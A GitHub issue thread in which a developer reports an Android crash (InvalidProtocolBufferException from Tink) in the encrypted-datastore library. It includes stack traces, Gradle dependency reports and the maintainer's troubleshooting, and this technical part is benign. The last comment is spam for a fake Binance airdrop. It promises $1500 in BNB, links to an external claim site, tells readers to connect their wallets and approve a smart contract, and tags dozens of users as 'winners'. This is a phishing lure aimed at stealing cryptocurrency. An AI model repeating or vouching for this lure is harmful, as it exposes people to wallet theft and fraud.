### ISSUE TITLE
InvalidProtocolBufferException (Protocol message contained an invalid tag (zero))

### ISSUE THREAD

**Issue by YassinELhadedy** [osipxd/encrypted-datastore#18]
app crash due to "androidx.security:security-crypto" that u internally use . i know this crash something related to google security-crypto library . but when I figure out for a solution I found many developers recommend to downgrade to ecurity-crypto:1.1.0-alpha01 , so does yr library support alpha versions or if u have any idea to solve this ? 

thanks

error log...
```
E/AndroidRuntime: FATAL EXCEPTION: main
    Process: com.app, PID: 2511
    java.lang.RuntimeException: Unable to create application com.app.MainApplication: com.google.crypto.tink.shaded.protobuf.InvalidProtocolBufferException: Protocol message contained an invalid tag (zero).
        at android.app.ActivityThread.handleBindApplication(ActivityThread.java:6790)
        at android.app.ActivityThread.-$$Nest$mhandleBindApplication(Unknown Source:0)
        at android.app.ActivityThread$H.handleMessage(ActivityThread.java:2134)
        at android.os.Handler.dispatchMessage(Handler.java:106)
        at android.os.Looper.loopOnce(Looper.java:201)
        at android.os.Looper.loop(Looper.java:288)
        at android.app.ActivityThread.main(ActivityThread.java:7898)
        at java.lang.reflect.Method.invoke(Native Method)
        at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:548)
        at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:936)
     Caused by: com.google.crypto.tink.shaded.protobuf.InvalidProtocolBufferException: Protocol message contained an invalid tag (zero).
        at com.google.crypto.tink.shaded.protobuf.ArrayDecoders.decodeUnknownField(ArrayDecoders.java:1036)
        at com.google.crypto.tink.shaded.protobuf.ArrayDecoders.decodeUnknownField(ArrayDecoders.java:1028)
        at com.google.crypto.tink.shaded.protobuf.ArrayDecoders.decodeUnknownField(ArrayDecoders.java:1028)
        at com.google.crypto.tink.shaded.protobuf.ArrayDecoders.decodeUnknownField(ArrayDecoders.java:1028)
        at com.google.crypto.tink.shaded.protobuf.MessageSchema.parseProto3Message(MessageSchema.java:5426)
        at com.google.crypto.tink.shaded.protobuf.MessageSchema.mergeFrom(MessageSchema.java:5442)
        at com.google.crypto.tink.shaded.protobuf.ArrayDecoders.decodeMessageField(ArrayDecoders.java:246)
        at com.google.crypto.tink.shaded.protobuf.ArrayDecoders.decodeMessageList(ArrayDecoders.java:704)
        at com.google.crypto.tink.shaded.protobuf.MessageSchema.parseProto3Message(MessageSchema.java:5373)
        at com.google.crypto.tink.shaded.protobuf.MessageSchema.mergeFrom(MessageSchema.java:5442)
        at com.google.crypto.tink.shaded.protobuf.GeneratedMessageLite.parsePartialFrom(GeneratedMessageLite.java:1567)
        at com.google.crypto.tink.shaded.protobuf.GeneratedMessageLite.parseFrom(GeneratedMessageLite.java:1680)
        at com.google.crypto.tink.proto.Keyset.parseFrom(Keyset.java:958)
        at com.google.crypto.tink.integration.android.SharedPrefKeysetReader.read(SharedPrefKeysetReader.java:84)
        at com.google.crypto.tink.CleartextKeysetHandle.read(CleartextKeysetHandle.java:61)
        at com.google.crypto.tink.integration.android.AndroidKeysetManager$Builder.read(AndroidKeysetManager.java:332)
        at com.google.crypto.tink.integration.android.AndroidKeysetManager$Builder.readOrGenerateNewKeyset(AndroidKeysetManager.java:288)

```

**Comment by osipxd** [comment]
What version of `security-crypto` you use now? You can check it using command:
```sh
./gradlew :app:dependencyInsight --dependency security-crypro --configuration releaseRuntimeClasspath
```
*(remember to replace `app` with your app module name and `releaseRuntime` with your build variant)*

**Comment by YassinELhadedy** [comment]
currently, we use "io.github.osipxd:security-crypto-datastore-preferences", version.ref = "1.0.0-beta01" 
is yr latest version.

**Comment by YassinELhadedy** [comment]
./gradlew :app:dependencyInsight --dependency security-crypro --configuration productionDebugRuntimeClasspath

Configuration on demand is an incubating feature.

FAILURE: Build failed with an exception.

* What went wrong:
org.gradle.api.InvalidUserDataException: Invalid catalog definition:
  - Problem: In version catalog libs, version reference '1.0.0.beta01' doesn't exist.
    
    Reason: Dependency 'io.github.osipxd:security-crypto-datastore-preferences' references version '1.0.0.beta01' which doesn't exist.
    
    Possible solutions:
      1. Declare '1.0.0.beta01' in the catalog.
      2. Use one of the following existing versions: 'accompanist', 'activity', 'androidGradle', 'apollo', 'appcompat', 'beagle', 'browserTabs', 'coil', 'composeBom', 'composeCompiler', 'composeConstraint', 'datastoreEncrypted', 'desugar', 'detekt', 'detektComposeRules', 'firebaseBom', 'firebaseCrashlyticsPlugin', 'fragment', 'googleAuth', 'googleServices', 'hiddenSecrets', 'hilt', 'hiltAndroid', 'iterableNotification', 'iterableNotificationUI', 'junit', 'kotlin', 'kotlinCoroutines', 'ksp', 'ktlint', 'leakCanary', 'licenses', 'lifecycle', 'material3', 'moshi', 'navigation', 'okhttpLoggingInterceptor', 'optimizely', 'playServices', 'resultKotlin', 'retrofit', 'room', 'rudderStack', 'splashScreen', 'testAndroidRunner', 'testJunit', 'testMockk', 'testTurbine', 'timber', 'viewPager2' or 'workManager'.
    
    Please refer to https://docs.gradle.org/7.6/userguide/version_catalog_problems.html#undefined_version_reference for more details about this problem.
> Invalid catalog definition:
    - Problem: In version catalog libs, version reference '1.0.0.beta01' doesn't exist.
      
      Reason: Dependency 'io.github.osipxd:security-crypto-datastore-preferences' references version '1.0.0.beta01' which doesn't exist.
      
      Possible solutions:
        1. Declare '1.0.0.beta01' in the catalog.
        2. Use one of the following existing versions: 'accompanist', 'activity', 'androidGradle', 'apollo', 'appcompat', 'beagle', 'browserTabs', 'coil', 'composeBom', 'composeCompiler', 'composeConstraint', 'datastoreEncrypted', 'desugar', 'detekt', 'detektComposeRules', 'firebaseBom', 'firebaseCrashlyticsPlugin', 'fragment', 'googleAuth', 'googleServices', 'hiddenSecrets', 'hilt', 'hiltAndroid', 'iterableNotification', 'iterableNotificationUI', 'junit', 'kotlin', 'kotlinCoroutines', 'ksp', 'ktlint', 'leakCanary', 'licenses', 'lifecycle', 'material3', 'moshi', 'navigation', 'okhttpLoggingInterceptor', 'optimizely', 'playServices', 'resultKotlin', 'retrofit', 'room', 'rudderStack', 'splashScreen', 'testAndroidRunner', 'testJunit', 'testMockk', 'testTurbine', 'timber', 'viewPager2' or 'workManager'.
      
      Please refer to https://docs.gradle.org/7.6/userguide/version_catalog_problems.html#undefined_version_reference for more details about this problem.

* Try:
> Run with --stacktrace option to get the stack trace.
> Run with --info or --debug option to get more log output.
> Run with --scan to get full insights.

* Get more help at https://help.gradle.org

BUILD FAILED in 381ms

**Comment by osipxd** [comment]
This library uses `security-crypto:1.0.0`, but it is possible that any of other libraries uses higher version of security-crypto.
Please run this command, to see version of androidx security-crypto:
```
./gradlew :app:dependencyInsight --dependency androidx.security:security-crypro --configuration productionDebugRuntimeClasspath
```

> Problem: In version catalog libs, version reference '1.0.0.beta01' doesn't exist.

Maybe you've declared `version.ref="1.0.0-beta01"` instead of `version="1.0.0-beta01"` in your version catalog?

**Comment by YassinELhadedy** [comment]
yes, i think the problem is due to version.ref = "1.0.0-beta01".


command result : 
 ./gradlew :app:dependencyInsight --dependency androidx.security:security-crypro --configuration productionDebugRuntimeClasspath --no-configure-on-demand


> Configure project :core:base
Unzip jar to /Users/yelhadedy/StudioProjects/android-app/core/base/build/hidden-secrets-tmp

> Task :app:dependencyInsight
No dependencies matching given input were found in configuration ':app:productionDebugRuntimeClasspath'

BUILD SUCCESSFUL in 2s

**Comment by YassinELhadedy** [comment]
> datastoreEncrypted

**Comment by YassinELhadedy** [comment]
yes, i 've used

datastoreEncrypted = "1.0.0-beta01"

{ module = "io.github.osipxd:security-crypto-datastore-preferences", version.ref = "datastoreEncrypted" }

and also when I run again the command the 

```
./gradlew :app:dependencyInsight --dependency security-crypto --configuration productionDebugRuntimeClasspath
Configuration on demand is an incubating feature.

> Configure project :core:base
Unzip jar to /Users/damiankozlak/Projects/Glassdoor/GNG/android-app/core/base/build/hidden-secrets-tmp

> Task :app:dependencyInsight
androidx.security:security-crypto:1.0.0
  Variant runtime:
    | Attribute Name                                             | Provided     | Requested    |
    |------------------------------------------------------------|--------------|--------------|
    | org.gradle.category                                        | library      |              |
    | org.gradle.libraryelements                                 | jar          |              |
    | org.gradle.status                                          | release      |              |
    | org.gradle.usage                                           | java-runtime | java-runtime |
    | com.android.build.api.attributes.AgpVersionAttr            |              | 7.4.2        |
    | com.android.build.api.attributes.BuildTypeAttr             |              | debug        |
    | com.android.build.api.attributes.ProductFlavor:environment |              | production   |
    | org.gradle.jvm.environment                                 |              | android      |
    | org.jetbrains.kotlin.platform.type                         |              | androidJvm   |

androidx.security:security-crypto:1.0.0
\--- io.github.osipxd:security-crypto-datastore:1.0.0-beta01
     \--- io.github.osipxd:security-crypto-datastore-preferences:1.0.0-beta01
          +--- productionDebugRuntimeClasspath
          +--- project :feature:bowls
          |    \--- productionDebugRuntimeClasspath
          +--- project :feature:home
          |    \--- productionDebugRuntimeClasspath
          +--- project :feature:notifications
          |    \--- productionDebugRuntimeClasspath
          +--- project :feature:onboarding
          |    \--- productionDebugRuntimeClasspath
          +--- project :feature:post
          |    \--- productionDebugRuntimeClasspath
          +--- project :feature:profile
          |    \--- productionDebugRuntimeClasspath
          +--- project :feature:saved
          |    \--- productionDebugRuntimeClasspath
          +--- project :core:facade
          |    +--- productionDebugRuntimeClasspath
          |    +--- project :feature:bowls (*)
          |    +--- project :feature:home (*)
          |    +--- project :feature:notifications (*)
          |    +--- project :feature:onboarding (*)
          |    +--- project :feature:post (*)
          |    +--- project :feature:profile (*)
          |    \--- project :feature:saved (*)
          +--- project :core:abtest
          |    \--- project :core:facade (*)
          +--- project :core:analytics
          |    +--- project :core:facade (*)
          |    \--- project :core:abtest (*)
          +--- project :core:network
          |    \--- project :core:facade (*)
          +--- project :core:notifications
          |    \--- project :core:facade (*)
          +--- project :core:database
          |    +--- project :core:facade (*)
          |    +--- project :core:network (*)
          |    \--- project :core:notifications (*)
          +--- project :core:design
          |    \--- project :core:facade (*)
          \--- project :core:base
               +--- project :core:facade (*)
               +--- project :core:abtest (*)
               +--- project :core:analytics (*)
               +--- project :core:network (*)
               +--- project :core:notifications (*)
               +--- project :core:database (*)
               \--- project :core:design (*)

io.github.osipxd:security-crypto-datastore:1.0.0-beta01
  Variant releaseVariantReleaseRuntimePublication:
    | Attribute Name                                             | Provided     | Requested    |
    |------------------------------------------------------------|--------------|--------------|
    | org.gradle.category                                        | library      |              |
    | org.gradle.dependency.bundling                             | external     |              |
    | org.gradle.libraryelements                                 | aar          |              |
    | org.gradle.status                                          | release      |              |
    | org.gradle.usage                                           | java-runtime | java-runtime |
    | com.android.build.api.attributes.AgpVersionAttr            |              | 7.4.2        |
    | com.android.build.api.attributes.BuildTypeAttr             |              | debug        |
    | com.android.build.api.attributes.ProductFlavor:environment |              | production   |
    | org.gradle.jvm.environment                                 |              | android      |
    | org.jetbrains.kotlin.platform.type                         |              | androidJvm   |

io.github.osipxd:security-crypto-datastore:1.0.0-beta01
\--- io.github.osipxd:security-crypto-datastore-preferences:1.0.0-beta01
     +--- productionDebugRuntimeClasspath
     +--- project :feature:bowls
     |    \--- productionDebugRuntimeClasspath
     +--- project :feature:home
     |    \--- productionDebugRuntimeClasspath
     +--- project :feature:notifications
     |    \--- productionDebugRuntimeClasspath
     +--- project :feature:onboarding
     |    \--- productionDebugRuntimeClasspath
     +--- project :feature:post
     |    \--- productionDebugRuntimeClasspath
     +--- project :feature:profile
     |    \--- productionDebugRuntimeClasspath
     +--- project :feature:saved
     |    \--- productionDebugRuntimeClasspath
     +--- project :core:facade
     |    +--- productionDebugRuntimeClasspath
     |    +--- project :feature:bowls (*)
     |    +--- project :feature:home (*)
     |    +--- project :feature:notifications (*)
     |    +--- project :feature:onboarding (*)
     |    +--- project :feature:post (*)
     |    +--- project :feature:profile (*)
     |    \--- project :feature:saved (*)
     +--- project :core:abtest
     |    \--- project :core:facade (*)
     +--- project :core:analytics
     |    +--- project :core:facade (*)
     |    \--- project :core:abtest (*)
     +--- project :core:network
     |    \--- project :core:facade (*)
     +--- project :core:notifications
     |    \--- project :core:facade (*)
     +--- project :core:database
     |    +--- project :core:facade (*)
     |    +--- project :core:network (*)
     |    \--- project :core:notifications (*)
     +--- project :core:design
     |    \--- project :core:facade (*)
     \--- project :core:base
          +--- project :core:facade (*)
          +--- project :core:abtest (*)
          +--- project :core:analytics (*)
          +--- project :core:network (*)
          +--- project :core:notifications (*)
          +--- project :core:database (*)
          \--- project :core:design (*)

io.github.osipxd:security-crypto-datastore-preferences:1.0.0-beta01
  Variant releaseVariantReleaseRuntimePublication:
    | Attribute Name                                             | Provided     | Requested    |
    |------------------------------------------------------------|--------------|--------------|
    | org.gradle.category                                        | library      |              |
    | org.gradle.dependency.bundling                             | external     |              |
    | org.gradle.libraryelements                                 | aar          |              |
    | org.gradle.status                                          | release      |              |
    | org.gradle.usage                                           | java-runtime | java-runtime |
    | com.android.build.api.attributes.AgpVersionAttr            |              | 7.4.2        |
    | com.android.build.api.attributes.BuildTypeAttr             |              | debug        |
    | com.android.build.api.attributes.ProductFlavor:environment |              | production   |
    | org.gradle.jvm.environment                                 |              | android      |
    | org.jetbrains.kotlin.platform.type                         |              | androidJvm   |

io.github.osipxd:security-crypto-datastore-preferences:1.0.0-beta01
+--- productionDebugRuntimeClasspath
+--- project :core:abtest
|    \--- project :core:facade
|         +--- productionDebugRuntimeClasspath
|         +--- project :feature:bowls
|         |    \--- productionDebugRuntimeClasspath
|         +--- project :feature:home
|         |    \--- productionDebugRuntimeClasspath
|         +--- project :feature:notifications
|         |    \--- productionDebugRuntimeClasspath
|         +--- project :feature:onboarding
|         |    \--- productionDebugRuntimeClasspath
|         +--- project :feature:post
|         |    \--- productionDebugRuntimeClasspath
|         +--- project :feature:profile
|         |    \--- productionDebugRuntimeClasspath
|         \--- project :feature:saved
|              \--- productionDebugRuntimeClasspath
+--- project :core:analytics
|    +--- project :core:facade (*)
|    \--- project :core:abtest (*)
+--- project :core:base
|    +--- project :core:facade (*)
|    +--- project :core:abtest (*)
|    +--- project :core:analytics (*)
|    +--- project :core:network
|    |    \--- project :core:facade (*)
|    +--- project :core:notifications
|    |    \--- project :core:facade (*)
|    +--- project :core:database
|    |    +--- project :core:facade (*)
|    |    +--- project :core:network (*)
|    |    \--- project :core:notifications (*)
|    \--- project :core:design
|         \--- project :core:facade (*)
+--- project :core:database (*)
+--- project :core:design (*)
+--- project :core:facade (*)
+--- project :core:network (*)
+--- project :core:notifications (*)
+--- project :feature:bowls (*)
+--- project :feature:home (*)
+--- project :feature:notifications (*)
+--- project :feature:onboarding (*)
+--- project :feature:post (*)
+--- project :feature:profile (*)
\--- project :feature:saved (*)

(*) - dependencies omitted (listed previously)

A web-based, searchable dependency report is available by adding the --scan option.

BUILD SUCCESSFUL in 1s
```

**Comment by osipxd** [comment]
Hm.. it looks like only this library uses `security-ctypto`. Can you create minimal reproducible example for the issue?

**Comment by YassinELhadedy** [comment]
[issue tracked ](https://issuetracker.google.com/issues/210008257)

and happened in Android 13 Pixel 4 but  ,it does not happen if we did a “Force stop” from the app “App info” menu and does not do a fresh install and just build the app form Android studio without uninstalling the app on device.

i think it's solved in  new androidx.security:security-crypto:1.1.0-alpha06 that uses com.google.crypto.tink:tink-android:1.8.0 
[suggestion](https://issuetracker.google.com/issues/158234058#comment112)

I think [crypto:1.1.0-alpha06 ](https://developer.android.com/jetpack/androidx/releases/security#1.1.0-alpha06)solve some issue related to tink

**Comment by osipxd** [comment]
So if I understood you correctly, I can do nothing on the library side to fix this issue? Can I close this issue?

**Comment by jmperezv** [comment]
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @abhilash-me, @zublock, @the-shank, @garciparedes, @trishankatdatadog, @pct960, @kolobok01, @dfischer, @snhdk, @osborne6, @cheeseng, @saulshanabrook, @shendebin, @charlie-x, @daviddesmet, @secondwtq, @sujunxuan, @viix, @eugene1g, @propol, @hopetribe, @latifanshori, @imloama, @andreaselia, @kei2100, @yutkin, @perfectquan, @daoleno, @bryanasdev000, @prakasa-tkpd, @artis3n, @lmdsp, @yaway, @yeroc, @suzukihr, @smnis, @Leoxad, @tdr130, @jerryryle, @louisliaoxh1989, @pudilan, @arafat5549, @tarrex, @cafababe, @nash-ye, @quyixia, @syev, @jiajieshen, @JonBetts, @infynite
